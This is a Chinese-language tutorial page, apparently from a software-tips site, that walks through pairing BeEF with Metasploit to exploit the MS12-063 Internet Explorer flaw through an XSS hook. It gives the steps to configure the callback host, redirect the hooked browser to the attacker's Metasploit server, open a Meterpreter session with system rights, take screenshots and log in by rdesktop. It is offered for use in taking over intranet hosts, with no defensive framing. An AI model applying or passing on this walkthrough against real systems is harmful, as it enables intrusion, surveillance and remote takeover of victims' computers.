桌面 处理 抽奖 参加 vip 关闭
网站首页 腾讯视频 爱奇艺视频 暴风影音 酷狗音乐 酷我音乐软件下载软件教程游戏教程电脑系统下载
时间:2023-4-3作者:未知来源:三度网教程人气:
系统:KALI 用到的工具:beEF+msf 利用的IE漏洞是:http://www.rapid7.com/db/modules/exploit/windows/browser/ie_execcommand_uaf MS12-063 AutomaticIE 7 on Windows XP SP3IE 8 on Windows XP SP3IE 7 on Windows VistaIE 8 on Windows VistaIE 8 on Windows 7IE 9 on Windows 7 用到的beef+msf 先配置下: root@kali:~# cd /usr/share/beef-xss/root@kali:/usr/share/beef-xss# lsbeef beef_key.pem config.yaml db Gemfile modulesbeef_cert.pem bundle core extensions Gemfile.lock 编辑下config.yaml 把metasploit :false改成true 再进入extensions/metasploit/ 同样修改下config.yaml 把host跟callback_host 改成自己的IP 这里是220.128 再改动下custom path: 这样beef已经配置好了。那就运行下metasploit 运行msf后 数据库连接下,不然上线也会没有提示的。这里的pass 就是extensions/metasploit/config.yaml里面的pass 这样就没有什么问题。我们可以先看一下beef.数据库只要连上了就不会出现msf的api错误的。 进入beef 账号密码beef 配置文件里面有。beef:beef 那beef已经都OK了。 现在来搞下选择下要显示的页面: hook.js 运行beef 显示出来的。 别忘记运行下apache。 我们再进入msf use exploit/windows/browser/ie_execcommand_uaf 可以自己根据自己的要求来选择。 show options port可以自已改。 我用xp+ie7 直接访问下我们的页面192.168.220.128/xss/ beef就会显示出来了。 点击 commands-hookeddomain-REDIRECT BROWSER 让他重新跳转到我们msf生成的地址上。beef很多功能。 把地址改成192.168.220.128:8080(msf生成的地址) 我们就会看到msf上面已经显示出来了。 回显了sessions payload可以自己去改。我使用的meterdivter载荷 执行sessions -i 执行sessions -i ID号 可以执行任意命令已经是系统权限 执行下screenshost meterdivter > screenshot Screenshot saved to: /root/dlsSQBkF.jpeg 就可以看到当前主机的屏幕内容。 也可以rdesktop 远程连接上去。 参数rdesktop -f ip -u username -p password 这也是一种xss挂马拿内网主机。 注:鄙人每天都在写一些metasploit的玩法,如果有大神有什么好的方法希望告诉我,我更新在空间,分享给大家。
关键词: metasploit运用IE漏洞XSS挂马拿内网主机
Copyright © 2012-2018 三度网教程(http://www.3du8.cn) .All Rights Reserved 网站地图 友情链接
免责声明:本站资源均来自互联网收集 如有侵犯到您利益的地方请及时联系管理删除,敬请见谅!
QQ:1006262270 邮箱:kfyvi376850063@126.com 手机版